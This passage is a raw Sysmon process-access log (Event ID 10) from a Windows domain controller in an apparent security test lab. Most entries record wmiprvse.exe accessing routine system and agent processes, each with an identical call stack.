Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 